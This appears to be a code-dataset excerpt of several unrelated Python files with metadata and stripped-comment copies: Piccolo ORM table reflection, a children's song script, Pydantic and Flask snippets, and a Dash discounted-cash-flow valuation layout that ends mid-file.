<gh_stars>1-10 import logging import pkgutil from typing import Iterator __all__ = ("get_package_names",) log = logging.getLogger(__name__) def get_package_names() -> Iterator[str]: """Iterate names of all packages located in /bot/exts/.""" for package in pkgutil.iter_modules(__path__): if package.ispkg: yield package.name
import logging import pkgutil from typing import Iterator __all__ = ("get_package_names",) log = logging.getLogger(__name__) def get_package_names() -> Iterator[str]: """Iterate names of all packages located in /bot/exts/.""" for package in pkgutil.iter_modules(__path__): if package.ispkg: yield package.name
en
0.985517
Iterate names of all packages located in /bot/exts/.
2.438308
2
piccolo/table_reflection.py
techolas23/piccolo
6
6627935
""" This is an advanced Piccolo feature which allows runtime reflection of database tables. """ import asyncio import typing as t from dataclasses import dataclass from piccolo.apps.schema.commands.generate import get_output_schema from piccolo.table import Table class Immutable(object): def _immutable(self, *args, **kwargs) -> TypeError: raise TypeError("%s object is immutable" % self.__class__.__name__) __delitem__ = __setitem__ = __setattr__ = _immutable # type: ignore class ImmutableDict(Immutable, dict): # type: ignore """A dictionary that is not publicly mutable.""" clear = pop = popitem = setdefault = update = Immutable._immutable # type: ignore # noqa: E501 def __new__(cls, *args): return dict.__new__(cls) def copy(self): raise NotImplementedError( "an immutabledict shouldn't need to be copied. use dict(d) " "if you need a mutable dictionary." ) def __reduce__(self): return ImmutableDict, (dict(self),) def _insert_item(self, key, value) -> None: """ insert an item into the dictionary directly. """ dict.__setitem__(self, key, value) def _delete_item(self, key) -> None: """ Delete an item from dictionary directly. """ dict.__delitem__(self, key) def __repr__(self): return f"ImmutableDict({dict.__repr__(self)})" class Singleton(type): """ A metaclass that creates a Singleton base class when called. """ _instances: t.Dict = {} def __call__(cls, *args, **kwargs): if cls not in cls._instances: cls._instances[cls] = super(Singleton, cls).__call__( *args, **kwargs ) return cls._instances[cls] @dataclass class TableNameDetail: name: str = "" schema: str = "" class TableStorage(metaclass=Singleton): """ A singleton object to store and access reflected tables. Currently it just works with Postgres. 
""" def __init__(self): self.tables = ImmutableDict() self._schema_tables = {} async def reflect( self, schema_name: str = "public", include: t.Union[t.List[str], str, None] = None, exclude: t.Union[t.List[str], str, None] = None, keep_existing: bool = False, ) -> None: """ Imports tables from the database into ``Table`` objects without hard-coding them. If a table has a reference to another table, the referenced table will be imported too. Reflection can have a performance impact based on the number of tables. If you want to reflect your whole database, make sure to only do it once or use the provided parameters instead of reflecting the whole database every time. :param schema_name: Name of the schema you want to reflect. :param include: It will only reflect the specified tables. Can be a list of tables or a single table. :param exclude: It won't reflect the specified tables. Can be a list of tables or a single table. :param keep_existing: If True, it will exclude the available tables and reflects the currently unavailable ones. Default is False. :returns: None """ include_list = self._to_list(include) exclude_list = self._to_list(exclude) if keep_existing: exclude += self._schema_tables.get(schema_name, []) output_schema = await get_output_schema( schema_name=schema_name, include=include_list, exclude=exclude_list ) add_tables = [ self._add_table(schema_name=schema_name, table=table) for table in output_schema.tables ] await asyncio.gather(*add_tables) def clear(self) -> None: """ Removes all the tables within ``TableStorage``. :returns: None """ dict.clear(self.tables) self._schema_tables.clear() async def get_table(self, tablename: str) -> t.Optional[t.Type[Table]]: """ Returns the ``Table`` class if it exists. If the table is not present in ``TableStorage``, it will try to reflect it. :param tablename: The name of the table, schema name included. If the schema is public, it's not necessary. For example: "public.manager" or "manager", "test_schema.test_table". 
:returns: Table | None """ table_class = self.tables.get(tablename) if table_class is None: tableNameDetail = self._get_schema_and_table_name(tablename) await self.reflect( schema_name=tableNameDetail.schema, include=[tableNameDetail.name], ) table_class = self.tables.get(tablename) return table_class async def _add_table(self, schema_name: str, table: t.Type[Table]) -> None: if issubclass(table, Table): table_name = self._get_table_name( table._meta.tablename, schema_name ) self.tables._insert_item(table_name, table) self._add_to_schema_tables( schema_name=schema_name, table_name=table._meta.tablename ) def _add_to_schema_tables(self, schema_name: str, table_name: str) -> None: """ We keep record of schemas and their tables for easy use. This method adds a table to its schema. """ schema_tables = self._schema_tables.get(schema_name) if schema_tables is None: self._schema_tables[schema_name] = [] else: self._schema_tables[schema_name].append(table_name) @staticmethod def _get_table_name(name: str, schema: str): if schema == "public": return name else: return schema + "." + name def __repr__(self): return f"{[tablename for tablename, _ in self.tables.items()]}" @staticmethod def _get_schema_and_table_name(tablename: str) -> TableNameDetail: """ Extract schema name and table name from full name of the table. :param tablename: The full name of the table. :returns: Returns the name of the schema and the table. """ tablename_list = tablename.split(".") if len(tablename_list) == 2: return TableNameDetail( name=tablename_list[1], schema=tablename_list[0] ) elif len(tablename_list) == 1: return TableNameDetail(name=tablename_list[0], schema="public") else: raise ValueError("Couldn't find schema name.") @staticmethod def _to_list(value: t.Any) -> t.List: if isinstance(value, list): return value elif isinstance(value, (tuple, set)): return list(value) elif isinstance(value, str): return [value] return []
""" This is an advanced Piccolo feature which allows runtime reflection of database tables. """ import asyncio import typing as t from dataclasses import dataclass from piccolo.apps.schema.commands.generate import get_output_schema from piccolo.table import Table class Immutable(object): def _immutable(self, *args, **kwargs) -> TypeError: raise TypeError("%s object is immutable" % self.__class__.__name__) __delitem__ = __setitem__ = __setattr__ = _immutable # type: ignore class ImmutableDict(Immutable, dict): # type: ignore """A dictionary that is not publicly mutable.""" clear = pop = popitem = setdefault = update = Immutable._immutable # type: ignore # noqa: E501 def __new__(cls, *args): return dict.__new__(cls) def copy(self): raise NotImplementedError( "an immutabledict shouldn't need to be copied. use dict(d) " "if you need a mutable dictionary." ) def __reduce__(self): return ImmutableDict, (dict(self),) def _insert_item(self, key, value) -> None: """ insert an item into the dictionary directly. """ dict.__setitem__(self, key, value) def _delete_item(self, key) -> None: """ Delete an item from dictionary directly. """ dict.__delitem__(self, key) def __repr__(self): return f"ImmutableDict({dict.__repr__(self)})" class Singleton(type): """ A metaclass that creates a Singleton base class when called. """ _instances: t.Dict = {} def __call__(cls, *args, **kwargs): if cls not in cls._instances: cls._instances[cls] = super(Singleton, cls).__call__( *args, **kwargs ) return cls._instances[cls] @dataclass class TableNameDetail: name: str = "" schema: str = "" class TableStorage(metaclass=Singleton): """ A singleton object to store and access reflected tables. Currently it just works with Postgres. 
""" def __init__(self): self.tables = ImmutableDict() self._schema_tables = {} async def reflect( self, schema_name: str = "public", include: t.Union[t.List[str], str, None] = None, exclude: t.Union[t.List[str], str, None] = None, keep_existing: bool = False, ) -> None: """ Imports tables from the database into ``Table`` objects without hard-coding them. If a table has a reference to another table, the referenced table will be imported too. Reflection can have a performance impact based on the number of tables. If you want to reflect your whole database, make sure to only do it once or use the provided parameters instead of reflecting the whole database every time. :param schema_name: Name of the schema you want to reflect. :param include: It will only reflect the specified tables. Can be a list of tables or a single table. :param exclude: It won't reflect the specified tables. Can be a list of tables or a single table. :param keep_existing: If True, it will exclude the available tables and reflects the currently unavailable ones. Default is False. :returns: None """ include_list = self._to_list(include) exclude_list = self._to_list(exclude) if keep_existing: exclude += self._schema_tables.get(schema_name, []) output_schema = await get_output_schema( schema_name=schema_name, include=include_list, exclude=exclude_list ) add_tables = [ self._add_table(schema_name=schema_name, table=table) for table in output_schema.tables ] await asyncio.gather(*add_tables) def clear(self) -> None: """ Removes all the tables within ``TableStorage``. :returns: None """ dict.clear(self.tables) self._schema_tables.clear() async def get_table(self, tablename: str) -> t.Optional[t.Type[Table]]: """ Returns the ``Table`` class if it exists. If the table is not present in ``TableStorage``, it will try to reflect it. :param tablename: The name of the table, schema name included. If the schema is public, it's not necessary. For example: "public.manager" or "manager", "test_schema.test_table". 
:returns: Table | None """ table_class = self.tables.get(tablename) if table_class is None: tableNameDetail = self._get_schema_and_table_name(tablename) await self.reflect( schema_name=tableNameDetail.schema, include=[tableNameDetail.name], ) table_class = self.tables.get(tablename) return table_class async def _add_table(self, schema_name: str, table: t.Type[Table]) -> None: if issubclass(table, Table): table_name = self._get_table_name( table._meta.tablename, schema_name ) self.tables._insert_item(table_name, table) self._add_to_schema_tables( schema_name=schema_name, table_name=table._meta.tablename ) def _add_to_schema_tables(self, schema_name: str, table_name: str) -> None: """ We keep record of schemas and their tables for easy use. This method adds a table to its schema. """ schema_tables = self._schema_tables.get(schema_name) if schema_tables is None: self._schema_tables[schema_name] = [] else: self._schema_tables[schema_name].append(table_name) @staticmethod def _get_table_name(name: str, schema: str): if schema == "public": return name else: return schema + "." + name def __repr__(self): return f"{[tablename for tablename, _ in self.tables.items()]}" @staticmethod def _get_schema_and_table_name(tablename: str) -> TableNameDetail: """ Extract schema name and table name from full name of the table. :param tablename: The full name of the table. :returns: Returns the name of the schema and the table. """ tablename_list = tablename.split(".") if len(tablename_list) == 2: return TableNameDetail( name=tablename_list[1], schema=tablename_list[0] ) elif len(tablename_list) == 1: return TableNameDetail(name=tablename_list[0], schema="public") else: raise ValueError("Couldn't find schema name.") @staticmethod def _to_list(value: t.Any) -> t.List: if isinstance(value, list): return value elif isinstance(value, (tuple, set)): return list(value) elif isinstance(value, str): return [value] return []
en
0.759556
This is an advanced Piccolo feature which allows runtime reflection of database tables. # type: ignore # type: ignore A dictionary that is not publicly mutable. # type: ignore # noqa: E501 insert an item into the dictionary directly. Delete an item from dictionary directly. A metaclass that creates a Singleton base class when called. A singleton object to store and access reflected tables. Currently it just works with Postgres. Imports tables from the database into ``Table`` objects without hard-coding them. If a table has a reference to another table, the referenced table will be imported too. Reflection can have a performance impact based on the number of tables. If you want to reflect your whole database, make sure to only do it once or use the provided parameters instead of reflecting the whole database every time. :param schema_name: Name of the schema you want to reflect. :param include: It will only reflect the specified tables. Can be a list of tables or a single table. :param exclude: It won't reflect the specified tables. Can be a list of tables or a single table. :param keep_existing: If True, it will exclude the available tables and reflects the currently unavailable ones. Default is False. :returns: None Removes all the tables within ``TableStorage``. :returns: None Returns the ``Table`` class if it exists. If the table is not present in ``TableStorage``, it will try to reflect it. :param tablename: The name of the table, schema name included. If the schema is public, it's not necessary. For example: "public.manager" or "manager", "test_schema.test_table". :returns: Table | None We keep record of schemas and their tables for easy use. This method adds a table to its schema. Extract schema name and table name from full name of the table. :param tablename: The full name of the table. :returns: Returns the name of the schema and the table.
2.569912
3
Farm.py
queengroot/Python-Old-McDonald
0
6627936
#<NAME> #Practice #<NAME> def chorus(animal, sound): print("<NAME> had a farm, E-I-E-I-O, and on that farm he had a " + animal + " E-I-E-I-O.") print("With a " + sound + " " + sound + " here and a " + sound + " " + sound+ " there. ") print("Here a " + sound + " there a "+ sound + " everywhere a " + sound + " " + sound) print("OldMacDonald had a farm, E-I-E-I-O.") def ending (sound): print("With a " + sound + " " + sound + " here and a " + sound + " " + sound+ " there.") print("Here a " + sound + " there a " + sound +" everywhere a " + sound + " " + sound) def title(): print("Old McDonald Had A Farm Program") def main(): #variables soundSingle = "" animalSingle = "" choice = "y" animals = [] sounds = [] length = 0 lengthSound = 0 #call title title() print() while choice.lower() == "y": animalSingle = input("Please enter an animal name: ") animals.append(animalSingle) print() soundSingle = input("Please enter the sound that animal makes: ") sounds.append(soundSingle) print() choice = input("Enter another animal? Y/N? ") print() length = len(animals) i = 0 #while i is less than the length of the string go through each array #i is 0, so it points to the first spot in the array! #then when it becomes one it goes to the next spot in the array. while i < length: chorus(animals[i],sounds[i]) i+=1 print() print() lengthSound = len(sounds) #call backwards #subtract two from the length, thus not repeating the last cluck cluck #have to subtract two because arrays start at 0 j = lengthSound - 2 while j >= 0: ending(sounds[j]) j -= 1 print("<NAME> had a farm E-I-E-I-OOOOOOO.........") print() print("Thanks for singing along!") print("This is changes to see how branches work") main()
#<NAME> #Practice #<NAME> def chorus(animal, sound): print("<NAME> had a farm, E-I-E-I-O, and on that farm he had a " + animal + " E-I-E-I-O.") print("With a " + sound + " " + sound + " here and a " + sound + " " + sound+ " there. ") print("Here a " + sound + " there a "+ sound + " everywhere a " + sound + " " + sound) print("OldMacDonald had a farm, E-I-E-I-O.") def ending (sound): print("With a " + sound + " " + sound + " here and a " + sound + " " + sound+ " there.") print("Here a " + sound + " there a " + sound +" everywhere a " + sound + " " + sound) def title(): print("Old McDonald Had A Farm Program") def main(): #variables soundSingle = "" animalSingle = "" choice = "y" animals = [] sounds = [] length = 0 lengthSound = 0 #call title title() print() while choice.lower() == "y": animalSingle = input("Please enter an animal name: ") animals.append(animalSingle) print() soundSingle = input("Please enter the sound that animal makes: ") sounds.append(soundSingle) print() choice = input("Enter another animal? Y/N? ") print() length = len(animals) i = 0 #while i is less than the length of the string go through each array #i is 0, so it points to the first spot in the array! #then when it becomes one it goes to the next spot in the array. while i < length: chorus(animals[i],sounds[i]) i+=1 print() print() lengthSound = len(sounds) #call backwards #subtract two from the length, thus not repeating the last cluck cluck #have to subtract two because arrays start at 0 j = lengthSound - 2 while j >= 0: ending(sounds[j]) j -= 1 print("<NAME> had a farm E-I-E-I-OOOOOOO.........") print() print("Thanks for singing along!") print("This is changes to see how branches work") main()
en
0.874812
#<NAME> #Practice #<NAME> #variables #call title #while i is less than the length of the string go through each array #i is 0, so it points to the first spot in the array! #then when it becomes one it goes to the next spot in the array. #call backwards #subtract two from the length, thus not repeating the last cluck cluck #have to subtract two because arrays start at 0
4.059488
4
src/api/schemas/parts.py
skbu3u/core
1
6627937
<filename>src/api/schemas/parts.py import re from typing import List from pydantic import BaseModel, validator from src.api.schemas.consumables import Consumable class PartCreate(BaseModel): name: str price: int compatibility: str @validator('name') def name_match(cls, name): if not re.match(r'^[\w\s.-]+$', name): raise ValueError(f"Name '{name}' is incorrect") return name.lower() # TODO Add price validations for parts @validator('compatibility') def compatibility_match(cls, compatibility): return compatibility.lower() class Part(PartCreate): id: int contains: List[Consumable] = [] class Config: orm_mode = True
<filename>src/api/schemas/parts.py import re from typing import List from pydantic import BaseModel, validator from src.api.schemas.consumables import Consumable class PartCreate(BaseModel): name: str price: int compatibility: str @validator('name') def name_match(cls, name): if not re.match(r'^[\w\s.-]+$', name): raise ValueError(f"Name '{name}' is incorrect") return name.lower() # TODO Add price validations for parts @validator('compatibility') def compatibility_match(cls, compatibility): return compatibility.lower() class Part(PartCreate): id: int contains: List[Consumable] = [] class Config: orm_mode = True
en
0.575527
# TODO Add price validations for parts
2.746345
3
application/api/resources/images_list.py
imghack/image_bot
3
6627938
from flask_restful import Resource # TODO: db connection should be one for all blueprints from application.db.db import get_all_images class ImagesList(Resource): def get(self): return get_all_images()
from flask_restful import Resource # TODO: db connection should be one for all blueprints from application.db.db import get_all_images class ImagesList(Resource): def get(self): return get_all_images()
en
0.748234
# TODO: db connection should be one for all blueprints
2.394089
2
layouts.py
codepatel/dcf
1
6627939
<filename>layouts.py from math import log10 import dash_core_components as dcc import dash_html_components as html import dash_bootstrap_components as dbc import dash_table as dt # Local imports from __init__ import VERSION, DEFAULT_TICKER, DEFAULT_SNAPSHOT_UUID from dash_utils import make_card, ticker_inputs, make_item, make_social_media_share from dynamic_layouts import get_dcf_current_year_input_overrides, get_other_input_overrides from assets.about import source_credits, assumptions from assets.disclaimer import disclaimer # Reference and some Dashboard components inspired by: https://medium.com/swlh/how-to-create-a-dashboard-to-dominate-the-stock-market-using-python-and-dash-c35a12108c93 navheader = dbc.Row([dbc.Col( dbc.Nav([ dbc.NavLink("Main", href="/", id='nav-main'), dbc.NavLink("DCF Valuation Analysis", href="/apps/dcf/AAPL", id='nav-dcf'), dbc.NavLink("Sector Value Analysis", href="/apps/sector", id='nav-sector'), ], pills=True), ), dbc.Col(id='social-share', align='right', width=400), dbc.Col([html.Small('VERSION:'), html.P(VERSION)], align='right', width=60) ]) tabheader = html.Div([ dbc.Tabs([ dbc.Tab(label="DCF Valuation Analysis", tab_id="tab-dcf"), dbc.Tab(label="Sector Value Analysis", tab_id="tab-sector"), ], id="tabs", active_tab="tab-dcf", ), html.Div(id="tab-content"), ]) dcflayout = html.Div([ navheader, # html.H3('DCF Valuation Analysis'), # MD text area Element for Introduction dbc.Row([dbc.Col( [dcc.Markdown(children=''' ### Purpose of this web app ### ##### To be one of the tools to educate and democratize fundamentals DCF (Discounted Cash Flow) Valuation Analysis of public equity investments ##### See below for more details, Assumptions and Disclaimer or visit [About this DCF Valuation App](https://codepatel.github.io/dcf/) ''' )], ), ]), # heading row dbc.Row([ dbc.Col([ make_card("Ticker for Analysis", "info", [ticker_inputs('ticker-input', 'date-picker', 12*5), # dbc.Select( # id='ticker-input', # options=[{'label': 
s['symbol']+'('+s['exchange']+'):'+s['name'], 'value': s['symbol']} for s in symdata], # value='AAPL', # placeholder='Start typing Ticker, press Enter'), dbc.FormGroup( [ dbc.Label("Analysis mode selection: (if inactive, use Snapshot mode)"), dbc.Checklist( options=[ {"label": "Live?", "value": 1}, ], value=[1], id="analysis-mode", switch=True, ), ] ), html.Data(id='snapshot-uuid', value=DEFAULT_SNAPSHOT_UUID), html.Div([dbc.Button('Save Snapshot', id='save-snapshot', color='primary'), html.Span(dbc.NavLink('Snapshot Link to Bookmark', id='snapshot-link', href='/apps/dcf/'+DEFAULT_TICKER+'/'+DEFAULT_SNAPSHOT_UUID, disabled=True), style={"vertical-align": "middle"}), ]), ]), html.Div(id='ticker-allcaps'), make_card('Status Message', 'success', dbc.Spinner(html.P(id='status-info', loading_state={'is_loading': True}), fullscreen=False)), make_card('Supplemental Info', 'success', dbc.Spinner([html.P(id='supp-info'), dcc.Store(id='fin-store'), dcc.Store(id='dcf-store'), dcc.Store(id='topsstream-data'), dcc.Store(id="handler-parseURL"), dcc.Store(id="handler-ticker-valid"), dcc.Store(id="handler-past-data"), dcc.Store(id="handler-dcf-data"), dcc.Store(id='handler-lastpricestream'), dcc.Interval( id='price-update-interval', interval=15*1000, # in milliseconds n_intervals=0 ) ])) ]), dbc.Col([ make_card('DCF Inputs - Company factors', 'info', dbc.Tabs([ dbc.Tab( dbc.Form([ dbc.Label("Revenue Growth Rate (%) for next year", html_for="rgr-next"), dbc.Input(id="rgr-next", type="number", value=0, min=-50, step=0.1, placeholder="Enter number", debounce=True ), dbc.Label("Operating Margin (%) for next year excl. 
Reinvestment", html_for="opm-next"), dbc.Input(id="opm-next", type="number", value=0, max=50, step=0.1, placeholder="Enter number", debounce=True ), html.Br(), dbc.Label("CAGR (%) for years 2-5 (select range: 0 to 15)", html_for="cagr-2-5"), dcc.Slider(id="cagr-2-5", min=0, max=15, step=0.1, value=5, tooltip={'always_visible': True, 'placement': 'topRight'}, marks={v: str(v) for v in range(0, 16)}), dbc.Label("Target Pre-Tax Operating Margin (%) in business model (select range: 0 to 50)", html_for="opm-target"), dcc.Slider(id="opm-target", min=0, max=50, step=0.1, value=20, tooltip={'always_visible': True, 'placement': 'topRight'}, marks={v: str(v) for v in range(0, 55, 5)}), dbc.Label("Sales to capital ratio (for computing reinvestment, select range: 0 to 5)", html_for="sales-to-cap"), dcc.Slider(id="sales-to-cap", min=0, max=5, step=0.01, value=1, tooltip={'always_visible': True, 'placement': 'topRight'}, marks={v: str(v) for v in range(0, 6)}), ]), label="GPE Levers", tab_id="tab-lever", label_style={"color": "#00AEF9"} ), dbc.Tab( dbc.Form([ html.P('In future, calculate Equity Risk Premium based on discrete inputs. 
For now, enter ERP:'), html.Br(), dbc.Label("Equity Risk Premium (%)", html_for="erp-calculated"), dbc.Input(id="erp-calculated", type="number", value=6, min=0, max=10, step=0.01, placeholder="Enter number", debounce=True ), ]), label="ERP Calculation", tab_id="tab-erp", label_style={"color": "#00AEF9"} ), ], id="company-tabs", active_tab="tab-lever", )) ]), dbc.Col([ make_card('DCF Inputs - Environmental factors', 'info', dbc.Form([ dbc.Label("Effective Tax Rate (%) (select range: 0 to 30)", html_for="tax-rate"), dcc.Slider(id="tax-rate", min=0, max=30, step=0.1, value=15, tooltip={'always_visible': True, 'placement': 'topRight'}, marks={v: str(v) for v in range(0, 35, 5)}), dbc.Label("Riskfree Rate (%) (select range: 0 to 5)", html_for="riskfree-rate"), dcc.Slider(id="riskfree-rate", min=0, max=5, step=0.25, value=1.25, tooltip={'always_visible': True, 'placement': 'topRight'}, marks={v: str(v) for v in range(0, 6)}), dbc.Label("Terminal Growth Rate (%) (select range: 0 to 5)", html_for="terminal-growth-rate"), dcc.Slider(id="terminal-growth-rate", min=0, max=5, step=0.25, value=3.5, tooltip={'always_visible': True, 'placement': 'topRight'}, marks={v: str(v) for v in range(0, 6)}, disabled=False), dbc.Label("Cost of Capital / Discount Rate (%) (select range: 0 to 15)", html_for="cost-of-cap"), dcc.Slider(id="cost-of-cap", min=0, max=15, step=0.25, value=8.5, tooltip={'always_visible': True, 'placement': 'topRight'}, marks={v: str(v) for v in range(0, 16)}), ])), make_card('DCF Outputs', 'success', dbc.Spinner(html.Div(id="dcf-data"))) ]), ]), #row 1 # Element for Graph plot of KPIndicators dbc.Row([ dbc.Col([ make_card("Past records Financial table (Current Year is TTM/MRQ) ", "secondary", dbc.Spinner(html.Div(id="fin-table"))), html.Small([html.A('Data source: Marketwatch.com', href='https://www.marketwatch.com/investing/stock/aapl/financials'), html.P('Copyright 2020 FactSet Research Systems Inc. All rights reserved. 
Source FactSet Fundamentals'), ]) ]), dbc.Col([html.Div([ html.H6('Select Parameter(s) to show trend over the past periods'), dcc.Dropdown( id='select-column', value=['ROCE(%)', 'Sales-to-Capital(%)', 'Net Profit Margin(%)', 'Revenue Growth(%)'], multi=True ), dbc.Spinner(dcc.Graph( id='plot-indicators' ))]) ]), ]), # row 2 dbc.Row([ dbc.Col(make_card("Current Year Input (Use Latest 10K/10Q to Override)", "warning", get_dcf_current_year_input_overrides()) ), dbc.Col(make_card("Other Input Overrides", "warning", [get_other_input_overrides(), html.Br(), dcc.Markdown(children=''' **Other Assumptions for Intrinsic Value DCF Valuation:**\n 1. TERMINAL_YEAR_LENGTH = 10 2. No Preferred stock/dividends in capital structure (you can override this) 3. No Convertible debt/equity portion in capital structure (you can override this) '''), dbc.Button("Run DCF calculation again with overrides", id='run-dcf', color='primary', block=True), make_card("DCF table (2-stage Terminal value after 10 years) ", "secondary", dbc.Spinner(html.Div(id="dcf-table"))) ])), dbc.Col([ make_card("Notes/Commentary", "primary", dbc.Textarea(bs_size="lg", placeholder='Enter your notes and commentary on the analysis') ) ]) ],form=True), # row 3 dbc.Row([ dbc.Col([ ]), ]), # row 4 dbc.Row([dbc.Col( # MD text area Element for interpretation and analysis of data dcc.Markdown(children=source_credits + assumptions + disclaimer) ) ]) # footer row ]) sectorlayout = html.Div([ navheader, # html.H3('Sector Value Analysis'), # MD text area Element for Introduction dbc.Row([dbc.Col( [dcc.Markdown(children=''' ### Find the best picks in the sector! ### ''' )], ), ]), # heading row html.Div(id='sector-app-display-value', children="Under Construction! Features may change without notice!", style={'backgroundColor': 'red', 'fontSize': '200%'}), html.Br(), dbc.NavLink('IEX Cloud is the easiest way to use financial data. 
Get started now by clicking this referral link!', href="https://iexcloud.io/s/b47b5006"), html.Br(), html.P("Please note that sandbox test response data shown below from IEX Cloud Sandbox APIs is purposefully manipulated to scramble values and is not suitable for production usage. Data returned in the sandbox will look real, but strings are scrambled, dates are manipulated, and numbers are changed.", style={'color': 'red'}), dbc.NavLink('See this link for more information on Sandbox Testing', href="https://iexcloud.io/docs/api/#testing-sandbox"), html.Br(), dcc.Store(id='sector-store'), # Element for Graph plot of Sector Picks dbc.Row([ dbc.Col([html.Div([ html.H5('Select Sector(s): '), dcc.Dropdown( id='select-sector', options=[{'label': i, 'value': i} for i in ["Electronic Technology", "Distribution Services", "Health Technology", "Commercial Services", "Industrial Services", "Finance", "Process Industries", "Transportation", "Technology Services", "Producer Manufacturing", "Retail Trade", "Consumer Services", "Non-Energy Minerals", "Utilities", "Miscellaneous", "Health Services", "Consumer Durables", "Consumer Non-Durables", "Communications", "Energy Minerals", "Government"]], value=["Electronic Technology", "Health Technology", "Technology Services"], multi=True ), ]) ]), ]), # row 1 dbc.Row([ dbc.Col([ html.Br(), dcc.Dropdown( id='select-company', value=[], multi=True, placeholder='Filter to one or more companies, start typing in dropdown' ), dbc.Label("Filter by Enterprise Value (in billions)", html_for="sector-ev-filter"), dcc.RangeSlider(id="sector-ev-filter", min=7, max=13, step=0.001, value=[8, 12.699], marks={i: str(10 ** (i-9))+'B' for i in range(7, 14)}, updatemode='drag', ), html.H5('Crossfilter-Yaxis'), dcc.Dropdown( id='crossfilter-yaxis-column', value='EBITDAToRevenueMargin', ), ], width=3), dbc.Col([ dbc.NavLink('Data provided by IEX Cloud', href="https://iexcloud.io"), dbc.Spinner(dcc.Graph(id='sector-distribution' )), 
html.H5('Crossfilter-Xaxis'), dcc.Dropdown( id='crossfilter-xaxis-column', value='EBITDAToEV(%)', ), html.H5('Workaround: IEX Data is unreliable, so can change to Market Cap for filtering, analysis instead of preferred method using Enterprise Value (which includes Debt leverage)'), html.Br(), html.H5('If graph is blank, IEX Data has been filtered out due to NAs') ]) ]), # row 2 dbc.Row([dbc.Col( # MD text area Element for footer dcc.Markdown(children=disclaimer) ) ]) # footer row ])
<filename>layouts.py from math import log10 import dash_core_components as dcc import dash_html_components as html import dash_bootstrap_components as dbc import dash_table as dt # Local imports from __init__ import VERSION, DEFAULT_TICKER, DEFAULT_SNAPSHOT_UUID from dash_utils import make_card, ticker_inputs, make_item, make_social_media_share from dynamic_layouts import get_dcf_current_year_input_overrides, get_other_input_overrides from assets.about import source_credits, assumptions from assets.disclaimer import disclaimer # Reference and some Dashboard components inspired by: https://medium.com/swlh/how-to-create-a-dashboard-to-dominate-the-stock-market-using-python-and-dash-c35a12108c93 navheader = dbc.Row([dbc.Col( dbc.Nav([ dbc.NavLink("Main", href="/", id='nav-main'), dbc.NavLink("DCF Valuation Analysis", href="/apps/dcf/AAPL", id='nav-dcf'), dbc.NavLink("Sector Value Analysis", href="/apps/sector", id='nav-sector'), ], pills=True), ), dbc.Col(id='social-share', align='right', width=400), dbc.Col([html.Small('VERSION:'), html.P(VERSION)], align='right', width=60) ]) tabheader = html.Div([ dbc.Tabs([ dbc.Tab(label="DCF Valuation Analysis", tab_id="tab-dcf"), dbc.Tab(label="Sector Value Analysis", tab_id="tab-sector"), ], id="tabs", active_tab="tab-dcf", ), html.Div(id="tab-content"), ]) dcflayout = html.Div([ navheader, # html.H3('DCF Valuation Analysis'), # MD text area Element for Introduction dbc.Row([dbc.Col( [dcc.Markdown(children=''' ### Purpose of this web app ### ##### To be one of the tools to educate and democratize fundamentals DCF (Discounted Cash Flow) Valuation Analysis of public equity investments ##### See below for more details, Assumptions and Disclaimer or visit [About this DCF Valuation App](https://codepatel.github.io/dcf/) ''' )], ), ]), # heading row dbc.Row([ dbc.Col([ make_card("Ticker for Analysis", "info", [ticker_inputs('ticker-input', 'date-picker', 12*5), # dbc.Select( # id='ticker-input', # options=[{'label': 
s['symbol']+'('+s['exchange']+'):'+s['name'], 'value': s['symbol']} for s in symdata], # value='AAPL', # placeholder='Start typing Ticker, press Enter'), dbc.FormGroup( [ dbc.Label("Analysis mode selection: (if inactive, use Snapshot mode)"), dbc.Checklist( options=[ {"label": "Live?", "value": 1}, ], value=[1], id="analysis-mode", switch=True, ), ] ), html.Data(id='snapshot-uuid', value=DEFAULT_SNAPSHOT_UUID), html.Div([dbc.Button('Save Snapshot', id='save-snapshot', color='primary'), html.Span(dbc.NavLink('Snapshot Link to Bookmark', id='snapshot-link', href='/apps/dcf/'+DEFAULT_TICKER+'/'+DEFAULT_SNAPSHOT_UUID, disabled=True), style={"vertical-align": "middle"}), ]), ]), html.Div(id='ticker-allcaps'), make_card('Status Message', 'success', dbc.Spinner(html.P(id='status-info', loading_state={'is_loading': True}), fullscreen=False)), make_card('Supplemental Info', 'success', dbc.Spinner([html.P(id='supp-info'), dcc.Store(id='fin-store'), dcc.Store(id='dcf-store'), dcc.Store(id='topsstream-data'), dcc.Store(id="handler-parseURL"), dcc.Store(id="handler-ticker-valid"), dcc.Store(id="handler-past-data"), dcc.Store(id="handler-dcf-data"), dcc.Store(id='handler-lastpricestream'), dcc.Interval( id='price-update-interval', interval=15*1000, # in milliseconds n_intervals=0 ) ])) ]), dbc.Col([ make_card('DCF Inputs - Company factors', 'info', dbc.Tabs([ dbc.Tab( dbc.Form([ dbc.Label("Revenue Growth Rate (%) for next year", html_for="rgr-next"), dbc.Input(id="rgr-next", type="number", value=0, min=-50, step=0.1, placeholder="Enter number", debounce=True ), dbc.Label("Operating Margin (%) for next year excl. 
Reinvestment", html_for="opm-next"), dbc.Input(id="opm-next", type="number", value=0, max=50, step=0.1, placeholder="Enter number", debounce=True ), html.Br(), dbc.Label("CAGR (%) for years 2-5 (select range: 0 to 15)", html_for="cagr-2-5"), dcc.Slider(id="cagr-2-5", min=0, max=15, step=0.1, value=5, tooltip={'always_visible': True, 'placement': 'topRight'}, marks={v: str(v) for v in range(0, 16)}), dbc.Label("Target Pre-Tax Operating Margin (%) in business model (select range: 0 to 50)", html_for="opm-target"), dcc.Slider(id="opm-target", min=0, max=50, step=0.1, value=20, tooltip={'always_visible': True, 'placement': 'topRight'}, marks={v: str(v) for v in range(0, 55, 5)}), dbc.Label("Sales to capital ratio (for computing reinvestment, select range: 0 to 5)", html_for="sales-to-cap"), dcc.Slider(id="sales-to-cap", min=0, max=5, step=0.01, value=1, tooltip={'always_visible': True, 'placement': 'topRight'}, marks={v: str(v) for v in range(0, 6)}), ]), label="GPE Levers", tab_id="tab-lever", label_style={"color": "#00AEF9"} ), dbc.Tab( dbc.Form([ html.P('In future, calculate Equity Risk Premium based on discrete inputs. 
